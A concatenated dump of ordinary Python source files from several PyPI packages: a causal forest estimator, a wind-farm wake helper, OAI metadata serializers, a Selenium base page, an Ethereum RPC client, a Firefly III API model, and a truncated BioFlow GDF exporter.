max_samples : int or float in (0, .5], default=.45,
The number of samples to use for each subsample that is used to train each tree:
- If int, then train each tree on `max_samples` samples, sampled without replacement from all the samples
- If float, then train each tree on ceil(`max_samples` * `n_samples`), sampled without replacement
from all the samples.
min_balancedness_tol: float in [0, .5], default=.45
How imbalanced a split we can tolerate. This enforces that each split leaves at least
(.5 - min_balancedness_tol) fraction of samples on each side of the split; or fraction
of the total weight of samples, when sample_weight is not None. Default value, ensures
that at least 5% of the parent node weight falls in each side of the split. Set it to 0.0 for no
balancedness and to .5 for perfectly balanced splits. For the formal inference theory
to be valid, this has to be any positive constant bounded away from zero.
honest : boolean, optional (default=True)
Whether to use honest trees, i.e. half of the samples are used for
creating the tree structure and the other half for the estimation at
the leafs. If False, then all samples are used for both parts.
subforest_size : int, default=4,
The number of trees in each sub-forest that is used in the bootstrap-of-little-bags calculation.
The parameter `n_estimators` must be divisible by `subforest_size`. Should typically be a small constant.
n_jobs : int or None, optional (default=-1)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :func:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
verbose : int, optional (default=0)
Controls the verbosity when fitting and predicting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self, *,
model_regression="auto",
model_propensity="auto",
featurizer=None,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
n_estimators=1000,
max_depth=None,
min_samples_split=5,
min_samples_leaf=5,
min_weight_fraction_leaf=0.,
max_features="auto",
min_impurity_decrease=0.,
max_samples=.45,
min_balancedness_tol=.45,
honest=True,
subforest_size=4,
n_jobs=-1,
verbose=0,
random_state=None):
self.n_estimators = n_estimators
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.min_impurity_decrease = min_impurity_decrease
self.max_samples = max_samples
self.min_balancedness_tol = min_balancedness_tol
self.honest = honest
self.subforest_size = subforest_size
self.n_jobs = n_jobs
self.verbose = verbose
super().__init__(model_regression=model_regression,
model_propensity=model_propensity,
model_final=None,
featurizer=featurizer,
multitask_model_final=False,
min_propensity=min_propensity,
categories=categories,
cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_model_final(self):
return RegressionForest(n_estimators=self.n_estimators,
max_depth=self.max_depth,
min_samples_split=self.min_samples_split,
min_samples_leaf=self.min_samples_leaf,
min_weight_fraction_leaf=self.min_weight_fraction_leaf,
max_features=self.max_features,
min_impurity_decrease=self.min_impurity_decrease,
max_samples=self.max_samples,
min_balancedness_tol=self.min_balancedness_tol,
honest=self.honest,
inference=True,
subforest_size=self.subforest_size,
n_jobs=self.n_jobs,
random_state=self.random_state,
verbose=self.verbose,
warm_start=False)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), False)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
Parameters
----------
Y: (n × d_y) matrix or vector of length n
Outcomes for each sample
T: (n × dₜ) matrix or vector of length n
Treatments for each sample
X: optional (n × dₓ) matrix
Features for each sample
W: optional (n × d_w) matrix
Controls for each sample
sample_weight : (n,) array like or None
Individual weights for each sample. If None, it assumes equal weight.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, `Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'blb'
(for Bootstrap-of-Little-Bags based inference)
Returns
-------
self
"""
if X is None:
raise ValueError("This estimator does not support X=None!")
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, groups=groups,
cache_values=cache_values, inference=inference)
def multitask_model_cate(self):
# Replacing to remove docstring
super().multitask_model_cate()
@property
def multitask_model_final(self):
return False
@multitask_model_final.setter
def multitask_model_final(self, value):
if value:
raise ValueError("Parameter `multitask_model_final` cannot change from `False` for this estimator!")
@property
def model_final(self):
return self._gen_model_final()
@model_final.setter
def model_final(self, model):
if model is not None:
raise ValueError("Parameter `model_final` cannot be altered for this estimator!") | PypiClean |
/FLORIS-3.4.1.tar.gz/FLORIS-3.4.1/floris/tools/optimization/legacy/scipy/derive_downstream_turbines.py |
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# See https://floris.readthedocs.io for documentation
import matplotlib.pyplot as plt
import numpy as np
def derive_downstream_turbines(fi, wind_direction, wake_slope=0.30, plot_lines=False):
"""Determine which turbines have no effect on other turbines in the
farm, i.e., which turbines have wakes that do not impact the other
turbines in the farm. This allows the user to exclude these turbines
from a control setpoint optimization, for example. This function
assumes a very simplified wake function where the wakes are assumed
to have a linearly diverging profile. In comparisons with the FLORIS
GCH model, the wake_slope matches well with the FLORIS' wake profiles
for a value of wake_slope = 0.5 * turbulence_intensity, where
turbulence_intensity is an input to the FLORIS model at the default
GCH parameterization. Note that does not include wind direction variability.
To be conservative, the user is recommended to use the rule of thumb:
`wake_slope = turbulence_intensity`. Hence, the default value for
`wake_slope=0.30` should be conservative for turbulence intensities up to
0.30 and is likely to provide valid estimates of which turbines are
downstream until a turbulence intensity of 0.50. This simple model saves
time compared to FLORIS.
Args:
fi ([floris object]): FLORIS object of the farm of interest.
wind_direction (float): The wind direction in the FLORIS frame
of reference for which the downstream turbines are to be determined.
wake_slope (float, optional): linear slope of the wake (dy/dx)
plot_lines (bool, optional): Enable plotting wakes/turbines.
Defaults to False.
Returns:
turbs_downstream (iterable): A list containing the turbine
numbers that have a wake that does not affect any other
turbine inside the farm.
"""
# Get farm layout
x = fi.layout_x
y = fi.layout_y
D = np.array([t.rotor_diameter for t in fi.floris.farm.turbines])
n_turbs = len(x)
# Rotate farm and determine freestream/waked turbines
is_downstream = [False for _ in range(n_turbs)]
x_rot = (
np.cos((wind_direction - 270.0) * np.pi / 180.0) * x
- np.sin((wind_direction - 270.0) * np.pi / 180.0) * y
)
y_rot = (
np.sin((wind_direction - 270.0) * np.pi / 180.0) * x
+ np.cos((wind_direction - 270.0) * np.pi / 180.0) * y
)
if plot_lines:
fig, ax = plt.subplots()
for ii in range(n_turbs):
ax.plot(
x_rot[ii] * np.ones(2),
[y_rot[ii] - D[ii] / 2, y_rot[ii] + D[ii] / 2],
"k",
)
for ii in range(n_turbs):
ax.text(x_rot[ii], y_rot[ii], "T%03d" % ii)
ax.axis("equal")
srt = np.argsort(x_rot)
x_rot_srt = x_rot[srt]
y_rot_srt = y_rot[srt]
for ii in range(n_turbs):
x0 = x_rot_srt[ii]
y0 = y_rot_srt[ii]
def wake_profile_ub_turbii(x):
y = (y0 + D[ii]) + (x - x0) * wake_slope
if isinstance(y, (float, np.float64, np.float32)):
if x < (x0 + 0.01):
y = -np.Inf
else:
y[x < x0 + 0.01] = -np.Inf
return y
def wake_profile_lb_turbii(x):
y = (y0 - D[ii]) - (x - x0) * wake_slope
if isinstance(y, (float, np.float64, np.float32)):
if x < (x0 + 0.01):
y = -np.Inf
else:
y[x < x0 + 0.01] = -np.Inf
return y
def determine_if_in_wake(xt, yt):
return (yt < wake_profile_ub_turbii(xt)) & (yt > wake_profile_lb_turbii(xt))
is_downstream[ii] = not any(
determine_if_in_wake(x_rot_srt[iii], y_rot_srt[iii]) for iii in range(n_turbs)
)
if plot_lines:
x1 = np.max(x_rot_srt) + 500.0
ax.fill_between(
[x0, x1, x1, x0],
[
wake_profile_ub_turbii(x0 + 0.02),
wake_profile_ub_turbii(x1),
wake_profile_lb_turbii(x1),
wake_profile_lb_turbii(x0 + 0.02),
],
alpha=0.1,
color="k",
edgecolor=None,
)
usrt = np.argsort(srt)
is_downstream = [is_downstream[i] for i in usrt]
turbs_downstream = list(np.where(is_downstream)[0])
if plot_lines:
ax.set_title("wind_direction = %03d" % wind_direction)
ax.set_xlim([np.min(x_rot) - 500.0, x1])
ax.set_ylim([np.min(y_rot) - 500.0, np.max(y_rot) + 500.0])
ax.plot(
x_rot[turbs_downstream], y_rot[turbs_downstream], "o", color="green",
)
return turbs_downstream | PypiClean |
/MOAI-2.0.0.tar.gz/MOAI-2.0.0/moai/metadata.py | from lxml.builder import ElementMaker
XSI_NS = 'http://www.w3.org/2001/XMLSchema-instance'
class OAIDC(object):
"""The standard OAI Dublin Core metadata format.
Every OAI feed should at least provide this format.
It is registered under the name 'oai_dc'
"""
def __init__(self, prefix, config, db):
self.prefix = prefix
self.config = config
self.db = db
self.ns = {'oai_dc': 'http://www.openarchives.org/OAI/2.0/oai_dc/',
'dc':'http://purl.org/dc/elements/1.1/'}
self.schemas = {'oai_dc': 'http://www.openarchives.org/OAI/2.0/oai_dc.xsd'}
def get_namespace(self):
return self.ns[self.prefix]
def get_schema_location(self):
return self.schemas[self.prefix]
def __call__(self, element, metadata):
data = metadata.record
OAI_DC = ElementMaker(namespace=self.ns['oai_dc'],
nsmap =self.ns)
DC = ElementMaker(namespace=self.ns['dc'])
oai_dc = OAI_DC.dc()
oai_dc.attrib['{%s}schemaLocation' % XSI_NS] = '%s %s' % (
self.ns['oai_dc'],
self.schemas['oai_dc'])
for field in ['title', 'creator', 'subject', 'description',
'publisher', 'contributor', 'type', 'format',
'identifier', 'source', 'language', 'date',
'relation', 'coverage', 'rights']:
el = getattr(DC, field)
for value in data['metadata'].get(field, []):
if field == 'identifier' and data['metadata'].get('url'):
value = data['metadata']['url'][0]
oai_dc.append(el(value))
element.append(oai_dc)
class MODS(object):
"""This is the minimods formats as defined by DARE.
It is registered as prefix 'mods'.'
"""
def __init__(self, prefix, config, db):
self.prefix = prefix
self.config = config
self.db = db
self.ns = {'mods': 'http://www.loc.gov/mods/v3',
'xml':'http://www.w3.org/XML/1998/namespace',
'dai': 'info:eu-repo/dai'}
self.schemas = {
'mods': 'http://www.loc.gov/standards/mods/v3/mods-3-2.xsd'}
def get_namespace(self):
return self.ns[self.prefix]
def get_schema_location(self):
return self.schemas[self.prefix]
def __call__(self, element, metadata):
data = metadata.record
MODS = ElementMaker(namespace=self.ns['mods'], nsmap=self.ns)
DAI = ElementMaker(namespace=self.ns['dai'], nsmap=self.ns)
mods = MODS.mods(version="3.2")
if data['metadata'].get('identifier'):
mods.append(MODS.identifier(data['metadata']['identifier'][0],
type="uri"))
if data['metadata'].get('url'):
mods.append(MODS.location(MODS.url(data['metadata']['url'][0])))
if data['metadata'].get('title'):
titleInfo = MODS.titleInfo(
MODS.title(data['metadata']['title'][0])
)
titleInfo.attrib['{%s}lang' % self.ns['xml']] = data['metadata'].get(
'language', ['en'])[0]
mods.append(titleInfo)
if data['metadata'].get('description'):
mods.append(MODS.abstract(data['metadata']['description'][0]))
for ctype in ['author', 'editor', 'advisor']:
contributor_data = []
for id in data['metadata'].get('%s_rel' % ctype, []):
contributor = self.db.get_metadata(id)
contributor['id'] = id
contributor_data.append(contributor)
if data['metadata'].get('%s_data' % ctype):
contributor_data = [s for s in data['metadata'][
'%s_data' % ctype]]
if not contributor_data:
contributor_data = [{'name':[a]} for a in data[
'metadata'].get(ctype, [])]
dai_list = []
for contributor in contributor_data:
unique_id = data['record']['id'] + '_' + contributor.get(
'id', contributor['name'][0])
if unique_id[0].isdigit():
unique_id = '_'+unique_id
unique_id = unique_id.replace(':', '')
name = MODS.name(
MODS.displayForm(contributor['name'][0]),
type='personal',
ID=unique_id
)
surname = contributor.get('surname')
if surname:
name.append(MODS.namePart(surname[0], type="family"))
firstname = contributor.get('firstname')
if firstname:
name.append(MODS.namePart(firstname[0], type="given"))
role = contributor.get('role')
if role:
role = role[0]
else:
roles = {'author': 'aut', 'editor': 'edt', 'advisor':'ths'}
role = roles[ctype]
name.append(
MODS.role(
MODS.roleTerm(role,
type='code',
authority='marcrelator')
))
mods.append(name)
dai = contributor.get('dai')
if dai:
dai_list.append((unique_id, dai))
if dai_list:
daiList = DAI.daiList()
for id, dai in dai_list:
daiList.append(DAI.identifier(
dai[0],
IDref=id,
authority='info:eu-repo/dai/nl'))
mods.append(MODS.extension(daiList))
dgg = data['metadata'].get('degree_grantor')
if dgg:
mods.append(MODS.name(
MODS.namePart(dgg[0]),
MODS.role(
MODS.roleTerm('dgg',
authority="marcrelator",
type="code")
),
type="corporate"))
if data['metadata'].get('language'):
mods.append(MODS.language(
MODS.languageTerm(data['metadata']['language'][0],
type="code",
authority="rfc3066")))
for host in ['journal', 'series']:
title = data['metadata'].get('%s_title' % host)
part_type = {'journal': 'host'}.get(host, host)
relitem = MODS.relatedItem(type=part_type)
if title:
relitem.append(MODS.titleInfo(MODS.title(title[0])))
else:
continue
issn = data['metadata'].get('%s_issn' % host)
if issn:
relitem.append(
MODS.identifier('urn:issn:%s' % issn[0],
type="uri"))
volume = data['metadata'].get('%s_volume' % host)
issue = data['metadata'].get('%s_issue' % host)
start_page = data['metadata'].get('%s_start_page' % host)
end_page = data['metadata'].get('%s_end_page' % host)
if volume or issue or end_page or start_page:
part = MODS.part()
if volume:
part.append(MODS.detail(MODS.number(volume[0]),
type="volume"))
if issue:
part.append(MODS.detail(MODS.number(issue[0]),
type="issue"))
if start_page or end_page:
extent = MODS.extent(unit="page")
if start_page:
extent.append(MODS.start(start_page[0]))
if end_page:
extent.append(MODS.end(end_page[0]))
part.append(extent)
relitem.append(part)
if data['metadata'].get('%s_publisher' % host):
relitem.append(
MODS.originInfo(
MODS.publisher(
data['metadata']['%s_publisher' % host][0])))
mods.append(relitem)
origin = MODS.originInfo()
mods.append(origin)
if data['metadata'].get('publisher'):
origin.append(MODS.publisher(data['metadata']['publisher'][0]))
if data['metadata'].get('date'):
origin.append(MODS.dateIssued(data['metadata']['date'][0],
encoding='iso8601'))
mods.append(MODS.typeOfResource('text'))
if data['metadata'].get('dare_type'):
mods.append(MODS.genre(data['metadata']['dare_type'][0]))
classifications = data['metadata'].get('classification', [])
for classification in classifications:
if classification.count('#') == 1:
authority, value = classification.split('#')
mods.append(MODS.classification(value, authority=authority))
else:
mods.append(MODS.classification(classification))
subjects = data['metadata'].get('subject', [])
if subjects:
s_el = MODS.subject()
for subject in subjects:
s_el.append(MODS.topic(subject))
mods.append(s_el)
if data['metadata'].get('rights'):
mods.append(MODS.accessCondition(data['metadata']['rights'][0]))
mods.attrib['{%s}schemaLocation' % XSI_NS] = '%s %s' % (
self.ns['mods'],
self.schemas['mods'])
element.append(mods) | PypiClean |
/HC_UIAutomation-0.0.1.tar.gz/HC_UIAutomation-0.0.1/page_action/base.py | import time
from selenium import webdriver
from util.log_util import logger
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.common.by import By
class Base:
_BASE_URL = ""
def __init__(self, base_driver=None,host=None):
"""初始化driver 如果存在,复用driver ,如果不存在 创建一个driver"""
if base_driver:
# 复用driver
logger.info("复用driver")
self.driver = base_driver
else:
# 为None
# 创建一个driver
# 第一步:创建一个driver实例变量
logger.info("创建driver")
self.driver = webdriver.Chrome()
self.driver.maximize_window()
self.driver.implicitly_wait(5)
if not self.driver.current_url.startswith("http"):
# 不以http 开头则打开_base_url
self._BASE_URL = host + "/portal/admin/#/login"
self.driver.get(self._BASE_URL)
def do_find(self, by, value=None):
logger.info(f"查找元素{by, value}")
"""查找单个元素"""
if value:
return self.driver.find_element(by, value)
else:
# (By.ID,"")
return self.driver.find_element(*by)
def do_finds(self, by, value=None):
"""查找多个元素"""
# (By.ID,"")
if value:
return self.driver.find_elements(by, value)
else:
return self.driver.find_elements(*by)
def do_send_keys(self, text, by, value=None):
logger.info(f"输入内容{text}")
"""输入文本"""
ele = self.do_find(by, value)
ele.clear()
ele.send_keys(text)
def explicit_wait(self,seconds,by):
logger.info(f"等待秒数{seconds},等待可点击元素{by}")
"""目前只写了显示等待元素可点击"""
WebDriverWait(self.driver,seconds).until(expected_conditions.element_to_be_clickable(by))
def operation_table(self,table_location):
"""
表格操作,以二维数组形式返回表格中所有的值
:param table_location: 定位表格的方法
:return:以二维数组形式返回表格中所有内容
"""
logger.info(f"表格定位地址为{table_location}")
_TABLE = (table_location)
tb_list = self.driver.find_element(*_TABLE).find_elements(By.TAG_NAME, "tr")
arr_list = []
for tr in tb_list:
arr = tr.text.split("\n")
arr_list.append(arr)
logger.info(f"表格内容为:{arr_list}")
return arr_list
def operation_ul_li(self,ul_location,li_value):
lis = self.do_finds(By.XPATH,ul_location)
for li in lis:
if li_value in li.text:
li.click()
break
def close_driver(self):
time.sleep(3)
self.driver.quit() | PypiClean |
/EtherPy-0.0.501.tar.gz/EtherPy-0.0.501/src/etherpy/Client.py | import requests
import json
from .Helper import Helper
class Client:
requestCount = 0
def __init__(self, host, port):
"""
Instantiate a new Ethereum Node client with the supplied host and port.
:param host: Host/IPAddress to connect to
:param port: Port to connect to JSON-RPC
"""
self.host = host
self.port = port
print("{0} {1}".format(host, port))
def request(self, payload):
self.requestCount += 1
url = "http://{0}:{1}".format(self.host, self.port)
headers = {'content-type': 'application/json'}
payload['id'] = self.requestCount
response = requests.post(
url, data=json.dumps(payload), headers=headers).json()
return response
def web3_client_version(self, raw=False):
"""
Get web3 client Version
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("web3_clientVersion")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def web3_sha3(self, data, raw=False):
"""
Compute the Keccak-256 of the given data
:param data:
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("web3_sha3")
payload['params'] = [
data
]
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def net_version(self, raw=False):
"""
Get the current network version for the node
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("net_version")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def net_listening(self, raw=False):
"""
Get if the node is listening for new connections
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("net_listening")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def net_peer_count(self, raw=False):
"""
Get the current peer count for the node
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("net_peerCount")
result = self.request(payload)
if raw:
return result
else:
return int(result['result'], 16)
def eth_protocol_version(self, raw=False):
"""
Get the node's protocol version
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_protocolVersion")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_syncing(self, raw=False):
"""
Get if the node is syncing
:param raw:
:return: Returns false if not syncing, object if syncing
"""
payload = Helper.generate_empty_payload("eth_syncing")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_coinbase(self, raw=False):
"""
Get the node's coinbase
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_coinbase")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_mining(self, raw=False):
"""
Get if the node is mining
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_mining")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_hashrate(self, raw=False):
"""
Get the hashrate of the node in hashes per second
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_hashrate")
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_gas_price(self, raw=False):
"""
Get the network gas price
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_gasPrice")
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_accounts(self, raw=False):
"""
Get accounts owned by the client
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_accounts")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_block_number(self, raw=False):
"""
Get the current block number
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_blockNumber")
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_balance(self, address, block_number="latest", raw=False):
"""
Get the balance of the given address in wei
:param address: address to get balance of
:param block_number: integer block number, or the string "latest", "earliest" or "pending"
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getBalance")
payload['params'] = [
address,
block_number
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_storage_at(self, address, position, block_number="latest", raw=False):
"""
Returns the value from a storage position at a given address.
:param address: Address of the storage
:param position: integer of the position in the storage in Ethereum compatible hex string
:param block_number: integer block number, or the string "latest", "earliest" or "pending"
:param raw:
:return:
"""
#TODO:Support Hashmap
payload = Helper.generate_empty_payload("eth_getStorageAt")
payload['params'] = [
address,
position,
block_number
]
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_get_transaction_count(self, address, block_number="latest", raw=False):
"""
Get the number of transactions **sent** from an address
:param address: address to get balance of
:param block_number: integer block number, or the string "latest", "earliest" or "pending"
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getTransactionCount")
payload['params'] = [
address,
block_number
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_block_transaction_count_by_hash(self, block, raw=False):
"""
Get the number of transactions in a block
:param block: hash of the block
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getBlockTransactionCountByHash")
payload['params'] = [
block
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_block_transaction_count_by_number(self, block, raw=False):
"""
Get the number of transactions in a block
:param block: block number
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getBlockTransactionCountByNumber")
payload['params'] = [
block
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result) | PypiClean |
/Firefly%20III%20API%20Python%20Client-1.5.6.post2.tar.gz/Firefly III API Python Client-1.5.6.post2/firefly_iii_client/model/transaction_link_read.py | import re # noqa: F401
import sys # noqa: F401
from firefly_iii_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from firefly_iii_client.exceptions import ApiAttributeError
def lazy_import():
from firefly_iii_client.model.object_link import ObjectLink
from firefly_iii_client.model.transaction_link import TransactionLink
globals()['ObjectLink'] = ObjectLink
globals()['TransactionLink'] = TransactionLink
class TransactionLinkRead(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'attributes': (TransactionLink,), # noqa: E501
'id': (str,), # noqa: E501
'links': (ObjectLink,), # noqa: E501
'type': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'attributes': 'attributes', # noqa: E501
'id': 'id', # noqa: E501
'links': 'links', # noqa: E501
'type': 'type', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, attributes, id, links, type, *args, **kwargs): # noqa: E501
"""TransactionLinkRead - a model defined in OpenAPI
Args:
attributes (TransactionLink):
id (str):
links (ObjectLink):
type (str): Immutable value
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.attributes = attributes
self.id = id
self.links = links
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, attributes, id, links, type, *args, **kwargs): # noqa: E501
"""TransactionLinkRead - a model defined in OpenAPI
Args:
attributes (TransactionLink):
id (str):
links (ObjectLink):
type (str): Immutable value
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.attributes = attributes
self.id = id
self.links = links
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.") | PypiClean |
/BioFlow-0.2.3.tar.gz/BioFlow-0.2.3/bioflow/utils/gdfExportInterface.py | import numpy as np
from scipy.sparse import lil_matrix
from bioflow.main_configs import Dumps
from bioflow.utils.general_utils.high_level_os_io import mkdir_recursive
# TODO: this class needs to be split into the GDF core that does all the work on a matrix rendering
# and filters that go_namespace_filter out the unwanted variables
class GdfExportInterface(object):
"""
An interface allowing the export of the matrix relatioin object and node characteristics to a
GDF format, compatible with visualization with appropriate tools.
:param target_fname: name of the file to which the GDF file will be written to
:param field_names: Names of different fields for the node description
:param field_types: Types of different nodes for the node description
:param node_properties_dict: dictionary mapping the node labels to outputs
:param min_current: minimal current below which we are not rendering the links anymore
:param index_2_label: Mapping from the indexes curent matrix lines/columns to the node labels
:param current_matrix: matrix of currents from which we wish to rendred the GDF
"""
Authorised_names = ['VARCHAR', 'DOUBLE', 'BOOLEAN']
def __init__(
self,
target_fname,
field_names,
field_types,
node_properties_dict,
min_current,
index_2_label,
label_2_index,
current_matrix,
directed=False):
mkdir_recursive(target_fname)
